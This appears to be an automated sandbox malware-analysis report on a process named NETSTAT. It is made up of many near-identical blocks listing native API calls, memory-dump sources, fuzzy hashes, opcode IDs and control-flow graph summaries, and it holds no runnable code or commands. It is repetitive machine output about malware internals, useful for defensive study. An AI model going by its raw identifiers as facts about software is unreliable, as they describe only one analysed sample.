• Instruction Fuzzy Hash: DF1107B2214209ABCB08DF98DC84DEB77ADAF8C314F05824DFA4DA7241C630E851CBA4

Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced). Basic blocks 26ba32a-26ba381; calls: 26baf30, NtCreateFile.

APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,026B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,026B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 026BA37D
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
• Instruction ID: dd72b9ddf7405b2f38f17539773694100655d41165d83a3e48e64a8d794f6f9d
• Opcode Fuzzy Hash: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
• Instruction Fuzzy Hash: AE01A4B2251108ABCB08CF88DC94EEB77ADAF8C754F558248FA5D97245D630E8518BA4

Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced). Basic blocks 26ba330-26ba381; calls: 26baf30, NtCreateFile.

APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,026B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,026B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 026BA37D
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 9efc3b2f30cf985662bbb32c5866e0ec34db4eda643cfadfe49972e47ffbaaa6
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: D6F0BDB2211208ABCB08CF88DC84EEB77EDAF8C754F158248BA0D97240C630E8518BA4
APIs
• NtReadFile.NTDLL(026B4D72,5EB65239,FFFFFFFF,026B4A31,?,?,026B4D72,?,026B4A31,FFFFFFFF,5EB65239,026B4D72,?,00000000), ref: 026BA425
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: bc75648c000a59e1df9a30607d3ca5aeb497269474b9012861ed2f17c67ddf2b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F0A4B2210208ABCB14DF89DC84EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(026B4D72,5EB65239,FFFFFFFF,026B4A31,?,?,026B4D72,?,026B4A31,FFFFFFFF,5EB65239,026B4D72,?,00000000), ref: 026BA425
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                  • Instruction ID: 65395beba820119a57a0c7799aa2ca984b7778cbdf4bbdfd754c509fb86e4993
                                                                                                                                                                                  • Opcode Fuzzy Hash: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F01DB2210148ABCB15DF98D890CEB7BADAF8C314B15869DFD4C97215C634E8558BA0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,026A2D11,00002000,00003000,00000004), ref: 026BA549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
                                                                                                                                                                                  • Instruction ID: 4dc59ad37ec8fcb9927d57b4d43e84c7b9c05e26a9c96a53772a88ccd703a89a
                                                                                                                                                                                  • Opcode Fuzzy Hash: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F05EB6210104AFDB14CF88CC80EE77BA9AF8C314F158549FE489B241C230E811CFA0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,026A2D11,00002000,00003000,00000004), ref: 026BA549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                  • Instruction ID: d44e32cb740fb3931f763ce5715710c2481e44ec28b413e0a2dfa11e4f9a3d7a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F015B2210208ABCB14DF89CC80EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(026B4D50,?,?,026B4D50,00000000,FFFFFFFF), ref: 026BA485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
                                                                                                                                                                                  • Instruction ID: 6e7da38994247e03c3513e047d9ebf58301e78a82a345f55ee7d6fcd9cb66eba
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E0C272200204BFD720EFE4CC48EDB7B68EF44350F104459F94EAB242C130E5108B90
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(026B4D50,?,?,026B4D50,00000000,FFFFFFFF), ref: 026BA485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                  • Instruction ID: a140a13cae6924b1c1ee7da8251163d6fce223989a995f2d94e8742e1d78be12
                                                                                                                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                  • Instruction Fuzzy Hash: 10D01776210214BBD720EBD8CC89EE77BADEF48760F154499BA589B242C530FA008BE0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 34782b202cdd99a6eb0f6468805c328209a9fdf3d48684674299d58c59c08a0b
                                                                                                                                                                                  • Instruction ID: 66ec3c3fbc21ae507a9b0b2ee30055fb6b3722f6f7f9132f17495ed6fd3aab7f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34782b202cdd99a6eb0f6468805c328209a9fdf3d48684674299d58c59c08a0b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D900261202414034105B1584515616440A87E4201B56D021E1015590DCB2589A16225
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 840863af7fa6a053f94a01371f05639d782efef55b1a007ae16975ccbf0104f8
                                                                                                                                                                                  • Instruction ID: ace0c4f6ef9fda350e814cdfc9bbafc452d4370c3f40f0d49c4d144d04a9ac36
                                                                                                                                                                                  • Opcode Fuzzy Hash: 840863af7fa6a053f94a01371f05639d782efef55b1a007ae16975ccbf0104f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2690023120141C03D180B158450564A040587D5301F96D015A0026654DCF158B6977A1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0498aadced85d0e19f00b57256713bf3cd574e239cb24d3b0e395ccb41155bef
• Instruction ID: 31a9d8880e0858b0257573f5526980329eaf14720156614a4d8598466ee158d2
• Opcode Fuzzy Hash: 0498aadced85d0e19f00b57256713bf3cd574e239cb24d3b0e395ccb41155bef
• Instruction Fuzzy Hash: 6890023120545C43D140B1584505A46041587D4305F56D011A0065694D9B258E65B761
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e6e4eb5ad416bb9a64e1d93f7c63717fd434550181810d6315f1e61ef1f7c818
• Instruction ID: 3c95fd689b41af5e333603676c0caf11599f227cbd03f829b5a349ff1ae3abf9
• Opcode Fuzzy Hash: e6e4eb5ad416bb9a64e1d93f7c63717fd434550181810d6315f1e61ef1f7c818
• Instruction Fuzzy Hash: 52900435311414030105F55C07055070447C7DD351357D031F1017550CDF31CD715331
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 61f53778e923471606b0459482c2d17c83b935a81f21a9beed868e0694586b83
• Instruction ID: aafef6bdc01d3938ebbf94f5dbedf46b7f7b3031ea5c50214e2f3b5663d72f5a
• Opcode Fuzzy Hash: 61f53778e923471606b0459482c2d17c83b935a81f21a9beed868e0694586b83
• Instruction Fuzzy Hash: 0F90026134141843D100B1584515B060405C7E5301F56D015E1065554D8B19CD626226
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 827f590b6d08e665937d669d58de704b32ea987be062af39ed1929b4e7fafd33
• Instruction ID: 7f55115e9d873ab49f1192db6ef8366834d3c5a38183310b0b135968e100874d
• Opcode Fuzzy Hash: 827f590b6d08e665937d669d58de704b32ea987be062af39ed1929b4e7fafd33
• Instruction Fuzzy Hash: 58900221211C1443D200B5684D15B07040587D4303F56D115A0155554CCF1589715621
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a720514b0c906fc4c3f6d1df342d7704021c8f8f3542dd84666089b578053996
• Instruction ID: 37e9931151f486a3164b5380af1821c8c3954e38794c71cb7b98372ce6261ff7
• Opcode Fuzzy Hash: a720514b0c906fc4c3f6d1df342d7704021c8f8f3542dd84666089b578053996
• Instruction Fuzzy Hash: DC90027120141803D140B1584505746040587D4301F56D011A5065554E8B598EE56765
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 037b354fa4f42b021777c89ccf9920d268b2d26d3baef5173750732a7dc4210e
• Instruction ID: 8d850a3e561d0506a85f0af8bacc4b3f059fb504881a22f477f59a2b4ad87271
• Opcode Fuzzy Hash: 037b354fa4f42b021777c89ccf9920d268b2d26d3baef5173750732a7dc4210e
• Instruction Fuzzy Hash: E690022921341403D180B158550960A040587D5202F96E415A0016558CCF1589795321
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3da826f3ebc958208006a240f38f90f41670443b77480b864639ffcee4fd0813
• Instruction ID: 21fc93137187f14ab5e4916d6effd88e910cdb690248a0dc97370a5d3c9b56c5
• Opcode Fuzzy Hash: 3da826f3ebc958208006a240f38f90f41670443b77480b864639ffcee4fd0813
• Instruction Fuzzy Hash: 30900221242455535545F1584505507440697E4241796D012A1415950C8B269966D721
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 38e79e170afff2f064f84b3c8a37b14f2b70aafcd3981661754e08ac3cd79d32
• Instruction ID: 2799ffe6788b47294d5f4cc4b0db16de8dda6d808d04cc1e0d7b7642fd41349b
• Opcode Fuzzy Hash: 38e79e170afff2f064f84b3c8a37b14f2b70aafcd3981661754e08ac3cd79d32
• Instruction Fuzzy Hash: D490023120141813D111B1584605707040987D4241F96D412A0425558D9B568A62A221
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8ca9d5d311925c57db1a421e843c3673ea17ec8eb5ca54bea31be5d5834e0db4
• Instruction ID: 193a4b38822a6aefd1abed2202c8f9f4c937dd2a0552adbe579acc9faeca0e47
• Opcode Fuzzy Hash: 8ca9d5d311925c57db1a421e843c3673ea17ec8eb5ca54bea31be5d5834e0db4
• Instruction Fuzzy Hash: 8490023120149C03D110B158850574A040587D4301F5AD411A4425658D8B9589A17221
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a0e25a848294ad439da9d47552988b300203ae0eb9f87fc4cbc9b2eea3266d8a
• Instruction ID: 35280e4b2b43d4975c5946adeef6151f763652f2755583d4b6a3a2901117b287
• Opcode Fuzzy Hash: a0e25a848294ad439da9d47552988b300203ae0eb9f87fc4cbc9b2eea3266d8a
• Instruction Fuzzy Hash: 0990023120141C43D100B1584505B46040587E4301F56D016A0125654D8B15C9617621
APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: e1884acc38a03dc8901bc2e29728ce363ee71820993c169ea9b1ae7e5397fe8c
                                                                                                                                                                                  • Instruction ID: e86af59511a2d4657929c22f3e0bbec416bcb6b766b0ea55b6cde05c51ffb4c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e1884acc38a03dc8901bc2e29728ce363ee71820993c169ea9b1ae7e5397fe8c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8290023120141803D100B5985509646040587E4301F56E011A5025555ECB6589A16231
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 201729cf1bc93e52303254449ba881d1841524fe31c2e88d1e410cd618a6bb3f
                                                                                                                                                                                  • Instruction ID: 1efee68a04dbc4874becda212e6a003a1b00d3dd3f44adb6c17ee37a70f0f98a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 201729cf1bc93e52303254449ba881d1841524fe31c2e88d1e410cd618a6bb3f
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA90023160551803D100B1584615706140587D4201F66D411A0425568D8B958A6166A2

                                                                                                                                                                                   Control-flow Graph
                                                                                                                                                                                   • Blocks 26b9050-26b9172: entry 26b9050-26b907f (26b9086 call 26bbd10) -> 26b908b-26b9092 -> either exit 26b916c-26b9172 or 26b9098-26b90e8 (calls 26bbde0, 26aacf0, 26b4e50); loop 26b90f0-26b9101 Sleep -> 26b9103-26b9109 -> 26b910b-26b9131 (call 26b8c70) or 26b9133-26b9153 (26b9154 call 26b8e80) -> 26b9159-26b915c -> 26b9166-26b916a -> back to 26b90f0 or exit 26b916c-26b9172
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 026B90F8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                  • Opcode ID: 8c1b0a8821647daacaec3ce7722ae7c2507ae3a6a3dae6e1edd96298393e188a
                                                                                                                                                                                  • Instruction ID: 2cd7873c720be05c7ec649779477095083624530573874e953b3678b5499d2f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c1b0a8821647daacaec3ce7722ae7c2507ae3a6a3dae6e1edd96298393e188a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 793181B6500744BBC725DF64C885FA7B7B9AF48B04F00851DEA2A5B245DB30B650CFA8

                                                                                                                                                                                   Control-flow Graph
                                                                                                                                                                                   • Blocks 26b9049-26b9172: entry 26b9049-26b9092 (call 26bbd10) -> either exit 26b916c-26b9172 or 26b9098-26b90e8 (calls 26bbde0, 26aacf0, 26b4e50); loop 26b90f0-26b9101 Sleep -> 26b9103-26b9109 -> 26b910b-26b9131 (call 26b8c70) or 26b9133-26b9153 (26b9154 call 26b8e80) -> 26b9159-26b915c -> 26b9166-26b916a -> back to 26b90f0 or exit 26b916c-26b9172
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 026B90F8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                  • Opcode ID: 90d374bf3d1fe4248f4fe765302a32593e562aca51855444eecbd96311da5a57
                                                                                                                                                                                  • Instruction ID: 1e80696c60a35bce6243cd1c42bd2d12ce92a2e9356ac60845998f32a50dd107
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90d374bf3d1fe4248f4fe765302a32593e562aca51855444eecbd96311da5a57
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D2191B2901244BBCB25DF64C885BABB7B5FF48704F10811DEA296B245D774A590CFA8

                                                                                                                                                                                   Control-flow Graph
